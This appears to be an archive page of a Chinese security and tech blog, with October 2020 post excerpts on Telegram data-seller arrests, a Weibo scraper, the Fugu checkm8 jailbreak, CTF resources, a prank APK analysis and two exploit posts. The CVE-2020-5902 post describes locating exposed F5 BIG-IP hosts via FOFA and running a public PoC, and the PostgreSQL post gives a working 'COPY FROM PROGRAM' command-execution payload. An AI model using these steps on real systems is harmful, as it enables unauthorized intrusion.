网站首页 发表在 2020年10月 的所有文章

  • 对“犯罪天堂”的telegram电报软件的一次突破​

    不要认为在telegram上搞坏事,卖数据就没人能抓住你,下面就是案例。 摒弃传统的网络通讯工具和收款方式,使用境外聊天软件以及虚拟币的收款方式……近日,苏州园区警方远赴湖南、广东两省,成功捣毁一条泄露、贩卖公民个人信息的黑色产业链,抓获犯罪嫌疑人6名,现场查获作案用手机11部、电脑5台、手机卡物联卡20张,查获非法获取的各类公民个人信息数百万条。 今年3月中旬,园区公安分局网安大队深入开展“净网2020”专项行动,在网络巡查中获取了一条网民出售公民个人信息的线索,该网民在一个跨境即时通讯软件内发布出售会计报考、卫生类报考、大学生、业主等数据以及寻找黑客的广告。民警核查该线索后有进一步发现,贩卖的公民个人信息包含大量苏州地区会计考试报名、医师护士考试报名、在校学生等数据,且收款方式以虚拟币为主。 由于当时正值疫情高发敏感时期,被侵害对象包括医师护士等抗疫一线人员及在校学生等重点保护群体,犯罪嫌疑人摒弃传统的网络通讯工具和收款方式,使用境外聊天软件以及虚拟币的收款方式,犯罪手段新颖,社会危害后果严重。为维护疫情期间社会稳定,打击侵犯抗疫一线人员侵公犯罪的嚣张气焰,园区分局立即抽调网警大队、胜浦派出所、斜塘派出所等部门精干警力组成专案组,并积极寻求网警支队支撑,展开侦查工作。 经过缜密侦查,专案民警网上侦查收集、网下蹲点核实,突出了位于广东省东莞市的犯罪嫌疑人李某。连续工作多日后,专案民警顺藤摸瓜掌握了李某等人涉嫌犯罪相关情况,查明了分别位于湖南省衡阳市和广东省东莞市的两个出售公民个人信息的团伙及窝点,共涉及六名犯罪嫌疑人。4月22日,专案民警分别赶赴湖南省衡阳市和广东省东莞市同时开展收网行动,一举将李某等六人抓获。 经查,该团伙平均年龄不到26岁,成员组织严密、分工明确,具备较强反侦查意识。其中,有2人负责通过黑客手段非法获取公民个人信息数据,3人负责通过通讯软件销售非法公民个人信息数据,还有1人提供资金和账户支持。经初步筛查,在警方查获的数百万条公民个人信息中涉及苏州地区数据就有近十万条,包含医师、护士、会计职称、注册会计师、经济师、建筑师、车主等方方面面。 本案成功侦破,是对号称“犯罪天堂”的telegram电报软件的一次突破,保障了抗疫一线医护人员的合法权益,避免了国家考试网站遭受攻击,阻止了大量公民信息流入诈骗犯罪分子手中用于电信诈骗;同时为涉及境外软件、虚拟币的违法犯罪侦破工作拓宽思路,积累经验。该案也得到了公安部的肯定与认可,2020年6月被公安部列为部督案件。 在干这类的别着急,干坏事的,早晚给你们全抓住!怕了吗?...

    2020-10-23 值得一看 1964
  • 酷我音乐真实地址解析

    总结上次酷狗的经验我没有去百度直接去抓协议 打开我们的网页酷我随便播放一个音 f12仔细看一下MP3在哪里 找到了酷我的音乐地址 使用rid替换即可 返回值是jso api: http://www.kuwo.cn/url?format=mp3&rid=77810434&response=url&type=convert_url3&br=128kmp3&from=web&t=1569587300382&reqId=4a567af1-e122-11e9-bade-01a02613b222 ...

    2020-10-22 技术教程 1405
  • 微博热点监控源码,可入库做数据分析。

    <?php class Curl {     //微博热点监控     public function Get_url_wb($url, $header)     {         $wburl = "https://s.weibo.com/weibo?q=";         // 1. 初始化 curl         $ch = curl_init();         // 设置URL和相应的选项         curl_setopt($ch, CURLOPT_URL, $url);//设置目标url         curl_setopt($ch, CURLOPT_HEADER, false);         //设置header         curl_setopt($ch, CURLOPT_HTTPHEADER, $header);         curl_setopt($ch, CURLOPT_HEADER, 0);//返回response头部信息         //要求结果为字符串且输出到屏幕上         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);         //规避SSL验证         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);         //跳过HOST验证         curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);         //运行curl         $data = curl_exec($ch);         curl_close($ch);         preg_match_all('/top" target="_blank">(.*?)<\/a>/U', $data, $Hot_search);//热搜名         preg_match_all('/<span>(.*?)<\/span>/U', $data, $Hotspot);//热度         preg_match_all('/href="\/weibo\?q=(.*?)Refer=top/U', $data, $Hoturl);//热度url         for ($i = 0; $i < count($Hoturl[1]); $i++) {             $Hoturl[1][$i] = $wburl . $Hoturl[1][$i];         }         $arr = ["Hot_search" => $Hot_search[1], "Hotspot" => $Hotspot[1], "Hoturl" => $Hoturl[1]];         return json_encode($arr, 448);     } } $a = new Curl(); $header = array(); echo $a->Get_url_wb("https://s.weibo.com/top/summary", $header); ...

    2020-10-22 实用工具 525
  • JAVA常见异常类型整理

    算数异常类:ArithmeticExecption   空指针异常类型:NullPointerException   类型强制转换类型:ClassCastException   数组负下标异常:NegativeArrayException   数组下标越界异常:ArrayIndexOutOfBoundsException   违背安全原则异常:SecturityException   文件已结束异常:EOFException   文件未找到异常:FileNotFoundException   字符串转换为数字异常:NumberFormatException   操作数据库异常:SQLException   输入输出异常:IOException   方法未找到异常:NoSuchMethodException   下标越界异常:IndexOutOfBoundsExecption   系统异常:SystemException   创建一个大小为负数的数组错误异常:NegativeArraySizeException   数据格式异常:NumberFormatException   安全异常:SecurityException   不支持的操作异常:UnsupportedOperationException ...

    2020-10-22 实用工具 445
  • fugu基于checkm8漏洞的开源越狱

    支持的设备 当前版本的Fugu仅支持iPad Pro(2017)和iPhone 7(iOS 13-13.3.1)。 项目获取 git clone https://github.com/LinusHenze/Fugu.git 建造 注意:广大研究人员也可以直接从本项目的【Release页面】下载Fugu的预编译版本。 在构建Fugu之前,请确保已安装好了Xcode以及Homebrew。 然后使用Homebrew来安装llvm和binutils: brew install llvm binutils 接下来,在Xcode中打开Fugu项目,选择Fugu作为目标并进行项目构建。构建完成后,Xcode将在构建目录中生成Fugu项目以及一个Shellcode目录,然后我们就可以开始使用Fugu了。 工具使用 我建议大家以无参数的形式运行Fugu,并查看所有的可用选项。 如果你想要对你的苹果设备进行越狱操作,可以直接运行下列命令: Fugu iStrap 你可能需要多次运行该命令才可以成功启用Fugu,如果你尝试了四、五次都没成功的话,请调整设备进入DFU模式后再进行尝试。 该命令将会向你的苹果设备发送一个内核启动引导程序以及iDownload(一款能够用来向苹果设备发送文件或执行命令的程序)。 安装Sileo、SSH和MobileSubstrate 注意:越狱有风险,操作需谨慎,请备份好所有文件后再进行操作,如操作对设备造成的损坏,请用户自行承担。 确保你的设备上已经安装好了libusbmuxd,如果没有安装,你可以通过Homebrew并使用下列命令来安装libusbmuxd: brew install libusbmuxd 安装好usbmuxd之后,启动你的苹果设备并进入越狱模式。同时,确保你的设备已通过USB连接到了你的macOS设备上。 接下来,使用下列命令安装Sileo: python install_sileo.py 运行该脚本之后,将会下载所有安装Sileo所需的组件并完成Sileo的安装。安装完成之后,你将会在应用程序栏中看到Sileo的图标。此时,SSH将会在后台运行,请确保已经修改了root/mobile密码。 组件Fugu由下列组件构成: 1、Fugu:macOS应用程序,可以通过checkm8漏洞来利用你苹果设备中的安全缺陷,并上传iStrap、iStrap加载器以及iDownload。 2、iStrap加载器:一段Shellcode代码,iBoot后会修复iBoot并加载iStrap。 3、iStrap:内核启动引导程序,会在苹果设备启动时显示,它会修复内核,注入启动参数并向内核注入Shellcode。 4、iDownload:运行在苹果设备上的程序,会在启动引导过程中完成安装。程序会监听端口1337,并且会给用户提供一个类似Bash的接口。 ...

    2020-10-21 技术教程 543
  • 干货|漏洞利用、实战练习平台、CTF比赛资源库

    一、漏洞利用、实战练习平台 1、WebGoat漏洞练习环境  https://github.com/WebGoat/WebGoat https://github.com/WebGoat/WebGoat-Legacy https://github.com/RandomStorm/DVWA 2、DoraBox,多拉盒 - 掌握常见漏洞攻防  https://github.com/gh0stkey/DoraBox 3、一个功能很全的CTF平台  https://github.com/zjlywjh001/PhrackCTF-Platform-Team 4、针对Pentest或者CTF的一个fuzz payload项目。  https://github.com/zer0yu/Berserker 5、Web安全实战:日安全-Web安全攻防小组关于Web安全的系列文章分享和HTB靶场  https://github.com/hongriSec/Web-Security-Attack 6、upload-labs很全的上传上传漏洞的靶场  https://github.com/c0ny1/upload-labs 7、跟踪真实漏洞相关靶场环境搭建  https://github.com/yaofeifly/Vub_ENV 8、数据库注入练习平台  https://github.com/Audi-1/sqli-labs 9、用node编写的漏洞练习平台,like OWASP Node Goat  https://github.com/cr0hn/vulnerable-node 10、基于https://www.exploit-db.com/的漏洞场景还原  https://github.com/havysec/vulnerable-scene 11、Ruby编写的一款工具,生成含漏洞的虚拟机  https://github.com/cliffe/secgen 12、metasploitable3  https://github.com/rapid7/metasploitable3/ 13、pentesterlab渗透测试在线练习  https://pentesterlab.com/exercises/ 14、轻量web漏洞演示平台  https://github.com/stamparm/DSVW 15、docker搭建的漏洞练习环境  https://github.com/MyKings/docker-vulnerability-environment 16、黑客技术训练环境  https://github.com/joe-shenouda/awesome-cyber-skills 17、web及app渗透训练平台  https://github.com/OWASP/SecurityShepherd 18、DevSecOps技能训练营  https://github.com/devsecops/bootcamp 19、injectify 生成一个便捷的高级中间人攻击Web站点  https://github.com/samdenty99/injectify 20、针对ctf线下赛流量抓取(php)、真实环境流量抓取分析的工具  https://github.com/wupco/weblogger 21、permeate:一个用于渗透透测试演练的WEB系统,用于提升寻找网站能力,也可以用于web安全教学  https://github.com/78778443/permeate 二、安全竞赛 (CTF夺标大赛) 1、Google2019CTF web 解题思路  https://xz.aliyun.com/t/5503 2、2018 第一届安洵杯 题目环境/源码  https://github.com/D0g3-Lab/AXB-CTF 3、google-ctf 包括2017和2018全部试题和答案  https://github.com/google/google-ctf/ 4、HCTF2017题目及解析  https://github.com/vidar-team/HCTF2017 5、CTF挑战平台  https://github.com/CTFTraining 6、灰帽子资源集,包括CTF、密码学、Linux攻击、USB攻击、漏洞等  https://github.com/bt3gl/Gray-Hacker-Resources 7、CTF和安全工具大合集  https://github.com/zardus/ctf-tools 8、近年CTF writeup大全  https://github.com/ctfs/write-ups-2016 9、HITB CTF 2017 Pwn题研究  http://0x48.pw/2017/08/29/0x49 10、脸谱CTF竞赛平台Demo  https://github.com/facebook/fbctf 11、CTF框架、类库、资源、软件和教程列表  https://github.com/apsdehal/awesome-ctf 12、CTF的题集  https://github.com/Hcamael/CTF_repo 13、CTF资源  https://github.com/ctfs/resources 14、CTF从入门到了解各种工具  https://github.com/SandySekharan/CTF-tool 15、p4团队的CTF解决方案  https://p4.team https://github.com/p4-team/ctf 16、ctftools 在线CTF信息网站,包括资源下载、在线工具、信息blog等  https://www.ctftools.com https://github.com/bollwarm/SecToolSet/blob/master/All.md ...

    2020-10-19 实用工具 1932
  • CVE-2020-5902 简单利用

    漏洞简述 F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。此漏洞允许未经身份验证的攻击者或经过身份验证的用户通过BIG-IP管理端口和/或自身IP对TMUI进行网络访问,以执行任意系统命令、创建或删除文件、禁用服务和/或执行任意Java代码。 受影响的版本 F5 BIG-IP 15.x 已知易受攻击版本 15.1.0、15.0.0F5 BIG-IP 14.x 已知易受攻击版本 14.1.0-14.1.2F5 BIG-IP 13.x 已知易受攻击版本 13.1.0-13.1.3F5 BIG-IP 12.x 已知易受攻击版本 12.1.0-12.1.5F5 BIG-IP 11.x 已知易受攻击版本 11.6.1-11.6.5 漏洞复现下载poc https://github.com/zhzyker/CVE-2020-5902 查找具备漏洞版本的目标,这里利用FOFA搜索的 title="BIG-IP" 关键信息 运行命令 python3 cve-2020-5902_file.py IP 利用成功,可以返回当前用户信息 注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。 ...

    2020-10-18 技术教程 570
  • 一份礼物.apk的逆向分析

    事情起因是震惊全国大学生的1013事件!!! 刚好看到社团群里在讨论这个,于是就发挥专业特长分析一下 拿到apk ,第一步肯定先放到虚拟机里跑一下看下效果emmm这似曾相识的页面,这熟悉的音量,唯一变化的就是音乐变成了O泡果奶的魔性洗脑广告。懂了,这不就是 "送给最好的ta.apk" 吗? 使用Android killer或apk改之理分析一下,这里使用Android Killer: 通过对比送给最好的ta.apk发现: 多了一个layout.lua文件,不过从名字上看这就是个布局文件,影响不大,再就是mp3文件名字从原来的0.mp3改为了mc.mp3,其他的都没变,甚至软件图标都没变。这个mc.mp3就是播放的广告音频了。 剩下的就简单了,虽然lua文件是加密过的,通过分析java代码,发现加密方式也没变,依旧使用/lib/armeabli-v7a/libluajava.so加密,因此使用ida7.0(x32)对这个文件逆向分析: 查找到在luaL.loadbufferx里面有对文件解密的过程 这里直接拿pcat大佬写的解密脚本: from ctypes import *import sys def decrypt(filename): s = open(filename, 'rb').read() outfile = 'out.lua' if s[0] == chr(0x1b) and s[1] != chr(0x4c): rst = chr(0x1b) size = len(s) v10 = 0 for i in range(1, size): v10 += size v = (c_ulonglong(-2139062143 * v10).value >> 32) + v10 v1 = c_uint(v).value >> 7 v2 = c_int(v).value < 0 rst += chr(ord(s[i]) ^ (v10 + v1 + v2) & 0xff) with open(outfile, 'wb') as f: f.write(rst) else: pass def foo(): print len(sys.argv) if len(sys.argv) == 2: filename = sys.argv[1] else: filename = 'main.lua' decrypt(filename) if __name__ == '__main__': foo() 将得到的文件使用unluac.jar进行还原,最终得到三个lua文件分别为: init.lua: local L0, L1appname = "\230\143\146\228\187\1829.0"appver = "9.0"packagename = "com.ta.cnm"appcode = "9"appsdk = "15"theme = "Theme_DeviceDefault_Light_NoActionBar"L0 = {}L1 = "WRITE_EXTERNAL_STORAGE"L0[1] = L1user_permission = L0 main.lua: local L0, L1, L2, L3L0 = requireL1 = "import"L0(L1)L0 = importL1 = "android.app.*"L0(L1)L0 = importL1 = "android.os.*"L0(L1)L0 = importL1 = "android.widget.*"L0(L1)L0 = importL1 = "android.view.*"L0(L1)L0 = importL1 = "android.view.View"L0(L1)L0 = importL1 = "android.content.Context"L0(L1)L0 = importL1 = "android.media.MediaPlayer"L0(L1)L0 = importL1 = "android.media.AudioManager"L0(L1)L0 = importL1 = "com.androlua.Ticker"L0(L1)L0 = activityL0 = L0.getSystemServiceL1 = ContextL1 = L1.AUDIO_SERVICEL0 = L0(L1)L0 = L0.setStreamVolumeL1 = AudioManagerL1 = L1.STREAM_MUSICL2 = 15L3 = AudioManagerL3 = L3.FLAG_SHOW_UIL0(L1, L2, L3)L0 = activityL0 = L0.getDecorViewL0 = L0()L0 = L0.setSystemUiVisibilityL1 = ViewL1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATIONL2 = ViewL2 = L2.SYSTEM_UI_FLAG_IMMERSIVEL1 = L1 | L2L0(L1)L0 = MediaPlayerL0 = L0()m = L0L0 = mL0 = L0.resetL0()L0 = mL0 = L0.setDataSourceL1 = activityL1 = L1.getLuaDirL1 = L1()L2 = "/mc.mp3"L1 = L1 .. L2L0(L1)L0 = mL0 = L0.prepareL0()L0 = mL0 = L0.startL0()L0 = mL0 = L0.setLoopingL1 = trueL0(L1)L0 = TickerL0 = L0()ti = L0L0 = tiL0.Period = 10L0 = tifunction L1() local L0, L1, L2, L3 L0 = activity L0 = L0.getSystemService L1 = Context L1 = L1.AUDIO_SERVICE L0 = L0(L1) L0 = L0.setStreamVolume L1 = AudioManager L1 = L1.STREAM_MUSIC L2 = 15 L3 = AudioManager L3 = L3.FLAG_SHOW_UI L0(L1, L2, L3) L0 = activity L0 = L0.getDecorView L0 = L0() L0 = L0.setSystemUiVisibility L1 = View L1 = L1.SYSTEM_UI_FLAG_HIDE_NAVIGATION L2 = View L2 = L2.SYSTEM_UI_FLAG_IMMERSIVE L1 = L1 | L2 L0(L1)endL0.onTick = L1L0 = tiL0 = L0.startL0()function L0(A0, A1) local L2, L3, L4, L5 L2 = string L2 = L2.find L3 = tostring L4 = A1 L3 = L3(L4) L4 = "KEYCODE_BACK" L2 = L2(L3, L4) if L2 ~= nil then L2 = activity L2 = L2.getSystemService L3 = Context L3 = L3.AUDIO_SERVICE L2 = L2(L3) L2 = L2.setStreamVolume L3 = AudioManager L3 = L3.STREAM_MUSIC L4 = 15 L5 = AudioManager L5 = L5.FLAG_SHOW_UI L2(L3, L4, L5) end L2 = true return L2endonKeyDown = L0 layout.lua: local L0, L1, L2, L3L0 = {}L1 = LinearLayoutL0.layout_width = "fill"L0.layout_height = "fill"L2 = {}L3 = ButtonL2.textColor = "#D50000"L2.text = "\230\131\138\228\184\141\230\131\138\229\150\156 \230\132\143\228\184\141\230\132\143\229\164\150"L2.layout_height = "match_parent"L2.layout_width = "match_parent"L2.background = "#88888888"L2[1] = L3L0[1] = L1L0[2] = L2return L0 分析这三个文件: init.lua:  定义了app的名字,版本(已经是9.0了吗),包名(有点暴躁啊这位老哥),sdk版本,使用的主题,需要的权限等数据 main.lua: 具体逻辑都在这里面,大概就是读取mc.mp3 播放 并一直把音量调整到15(最大),监听禁用返回按钮。 layout.lua: 设置页面布局 恶搞一时爽,但是也要有度。 万一下一次是个带病毒的文件呢? 对了  解决方案-----------关掉进程或关机! ...

    2020-10-16 技术教程 693
  • 安卓手机时间突然变慢10多分钟:原因不详

    10月12日晚间,众多网友突然发现,自己的安卓手机显示的时间,与北京时间相比慢了10多分钟,绝大部分都在16-17分钟左右。 由于事发突然而且诡异,几乎所有人都是懵圈状态,以为是自己的手机出了问题,或者穿越了。 汇总目前的情况看,这次事件变慢问题仅限安卓手机,而且似乎和品牌、地域无关,即便关机重启也不行,iPhone则并无问题。 有网友称,地铁刷卡处堵了一大批人,都是手机时间不对,无法扫码,乘务员也说是时间问题。 还有的网友表示,差点给自己爸爸换了个手机。 目前尚不清楚为何会出现这种情况,有人支招说开关一下飞行模式即可,还有的发现关闭自动设置时间即可。有遭遇的网友不妨一试。 ...

    2020-10-13 值得一看 523
  • PostgreSQL 高权限命令执行漏洞

    PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 默认账号密码为postgres/postgres。 首先连接到postgres中,并执行参考链接中的POC: <font face="宋体" size="4">DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;</font> FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中 大概就这些…… ...

    2020-10-09 技术教程 602
  • 外交部:中国遭受境外网络攻击持续增加

    中国国家互联网应急中心日前发布的2020年上半年中国互联网网络安全监测数据分析报告显示,中国遭受来自境外的网络攻击持续增加,美国是针对中国网络攻击的最大来源国。对此,中国外交部发言人汪文斌29日表示,中方更有理由对此前美国媒体关于美国大力推行网络空间“持续交手”战略,降低授权门槛肆意对他国关键信息基础设施发动攻击的报道表示担忧。 汪文斌在当天举行的外交部例行记者会上表示,中方已注意到这份报告,报告内容反映了中国在网络安全领域面临的一些突出挑战。首先中国仍是网络攻击的主要受害者之一,在疫情期间遭受的网络攻击有增无减。其次,美国是针对中国网络攻击的最大来源国。从境外计算机恶意程序捕获次数、向境外恶意程序控制服务器数量、境外拒绝服务攻击(DDoS)次数、向中国境内网站植入后门等多项指标看,美国均高居首位。 他表示,第三,针对中国关键信息基础设施的网络侦察值得关注。报告显示,中国工业控制系统的网络资产持续遭受来自境外的扫描嗅探,日均超过2万次,目标涉及境内能源、制造、通信等重点行业的联网工业控制设备和系统。与其他类型网络攻击相比,上述网络侦察行动更可能具有较强的政府背景。 “我想强调的是,网络攻击是各国面临的共同挑战,中国一贯主张各国在相互尊重、平等互利的基础上加强对话合作,共同应对这一挑战。我们也呼吁各国在网络空间采取负责任的行为。同时,中国将采取必要措施,增进自身网络安全,特别是保护关键信息基础设施免受威胁和破坏。”汪文斌称。 ...

    2020-10-02 值得一看 501

联系我们

在线咨询:点击这里给我发消息

QQ交流群:

工作日:8:00-23:00,节假日休息

扫码关注